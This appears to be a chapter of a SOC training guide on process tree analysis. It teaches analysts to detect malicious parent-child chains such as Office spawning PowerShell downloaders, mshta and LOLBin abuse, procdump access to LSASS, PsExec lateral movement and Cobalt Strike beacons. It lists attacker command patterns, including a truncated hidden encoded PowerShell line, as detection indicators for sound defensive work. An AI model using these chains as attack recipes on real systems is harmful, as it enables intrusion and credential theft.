Process Tree Analysis is the method of examining how processes start, interact, and spawn each other on an endpoint.
It is one of the most important skills in SOC and EDR investigations because most attacks leave clear traces in the process lineage.
A malicious process almost always comes from a suspicious parent, uses abnormal command-line arguments, or spawns additional processes to perform harmful actions.
This chapter explains process tree analysis in full-scale SOC depth, showing how analysts detect malware, abuse of legitimate tools, exploitation, and lateral movement by studying parent-child process relationships.
Why Process Trees Matter in SOC
A process tree shows:
-
Which process executed first
-
What child processes were created
-
Whether the execution chain is normal or suspicious
-
Which scripts, tools, or binaries were spawned
-
Whether the attack is fileless
-
How malware achieved persistence or C2
Most advanced attacks rely heavily on process chains.
Forensic-level visibility comes from EDR telemetry:
-
process_name
-
parent_process
-
command_line
-
integrity level
-
file path
-
network activity
-
timestamps
Process trees reconstruct the attacker’s behavior step-by-step.
Understanding Process Trees (SOC Breakdown)
A process tree begins with a parent process and captures all children it spawns.
Example of Legitimate Chain
explorer.exe → chrome.exe
Example of Suspicious Chain
WINWORD.exe → powershell.exe → curl.exe → payload.exe
The second chain strongly indicates malicious execution.
Key Elements Analysts Check
1. Parent Process
The process that initiated execution.
Abnormal parent processes immediately raise suspicion.
Examples:
-
Office applications spawning PowerShell
-
PDF readers spawning cmd.exe
-
Browser spawning mshta.exe
-
wscript.exe running DLLs
2. Child Processes
The processes spawned from a parent.
Malware often spawns:
-
PowerShell
-
cmd
-
rundll32
-
regsvr32
-
mshta
-
wscript/cscript
-
python.exe
-
bash
Any unexpected chain is a red flag.
3. Command-Line Arguments
The most revealing part of process tree analysis.
Suspicious indicators include:
-
-enc(encoded PowerShell) -
-nop(no profile) -
Invoke-Expression -
Base64 strings
-
Outbound URLs
-
File downloads
-
DLL loading
Example:
powershell.exe -nop -w hidden -enc JAB...
4. Execution Path
Malware rarely runs from secure directories.
Suspicious paths include:
-
C:\Users\Public\ -
AppData\Roaming\ -
%TEMP% -
%ProgramData% -
/tmp/ -
/var/tmp/
5. Timing & Frequency
Attackers often trigger processes:
-
Outside business hours
-
Repeatedly every few minutes
-
In sequence with other suspicious processes
6. Network Connections
Many child processes establish outbound connections.
Example:
powershell.exe → 91.22.113.10:443
Network activity attached to process chain confirms C2 behavior.
SOC Process Tree Patterns
Below are the most common attack patterns found in real SOC investigations.
1. Office App → Script Engine → Downloader → Payload
Pattern:
WINWORD.exe → powershell.exe → curl/wget → payload.exe
Indicators:
-
Encoded commands
-
Hidden window
-
Download from suspicious domain
Associated with:
-
Phishing-based malware
-
Initial access malware loaders
2. Browser → mshta.exe → Script Execution
Pattern:
chrome.exe → mshta.exe → malicious.hta script
Used for:
-
HTML-based phishing downloads
-
Remote script loading
3. LOLBins (Living-Off-The-Land Binaries)
Attackers abuse Windows binaries to avoid detection.
Common LOLBins:
-
rundll32.exe -
regsvr32.exe -
wmic.exe -
mshta.exe -
powershell.exe -
bitsadmin.exe
Example:
rundll32.exe → loads attacker DLL from C:\Users\Public
4. Persistence Mechanism Chain
Pattern:
schtasks.exe → powershell.exe → malicious.ps1
or
reg.exe → writes Run key → payload.exe
Used for persistence creation.
5. Credential Dumping Chain
Pattern:
attacker.exe → lsass.exe (memory access)
or
procdump.exe → lsass.exe
Anything accessing LSASS must be investigated.
6. Lateral Movement Process Trees
Examples:
-
PsExec executions
-
WinRM scripts
-
WMI processes
Pattern:
wmiprvse.exe → cmd.exe → rundll32.exe
Indicates remote code execution.
7. Fileless Malware Behavior
Pattern:
powershell.exe → in-memory loader → reflective DLL → no file drop
EDR telemetry reveals memory injection.
Performing Process Tree Analysis (SOC Workflow)
Analysts follow a step-by-step method.
Step 1 — Start at Alerted Process
Example:
Alert: powershell.exe -enc
Step 2 — Identify Parent Process
Check if parent is normal:
WINWORD.exe → suspicious
explorer.exe → baseline
Step 3 — Review Command Line
Look for:
-
Base64
-
Download commands
-
Execution flags
-
Suspicious file paths
Step 4 — Expand Child Processes
Example:
powershell.exe → payload.exe → miner.exe
This shows full attack path.
Step 5 — Check Network Activity
Look for:
-
C2 domains
-
Unusual ports
-
Repeated beaconing
Step 6 — Map Behavior to MITRE ATT&CK
Example:
-
T1059.001 (PowerShell)
-
T1021 (Lateral Movement)
-
T1105 (Ingress Tool Transfer)
Step 7 — Decide Severity
If tree shows malicious behavior → escalate to L2/L3.
Step 8 — Apply Containment
Examples:
-
Kill processes
-
Isolate host
-
Block outbound domain
Practical Process Tree Examples
Example 1 — Macro-Based Malware Infection
WINWORD.exe
↳ powershell.exe
↳ curl.exe
↳ dropper.exe
This is a classic phishing infection chain.
Example 2 — Crypto Miner
python.exe
↳ xmrig.exe
Suspicious because python rarely spawns miners.
Example 3 — Cobalt Strike Beacon
rundll32.exe
↳ dllhost.exe
↳ powershell.exe
↳ http(s) beacon
Highly malicious.
Example 4 — Lateral Movement via PsExec
psexecsvc.exe
↳ cmd.exe
↳ powershell.exe
Indicates remote execution from another host.
Intel Dump
-
Process tree analysis reveals the full attacker execution chain.
-
Analysts evaluate parent processes, child processes, command lines, paths, and network activity.
-
Suspicious chains include Office → PowerShell, browser → mshta, and LOLBin-based sequences.
-
Process trees help detect fileless malware, C2 beacons, persistence, and lateral movement.
-
Investigation workflow: start at alert → validate parent → inspect children → analyze behavior → align to MITRE → escalate or respond.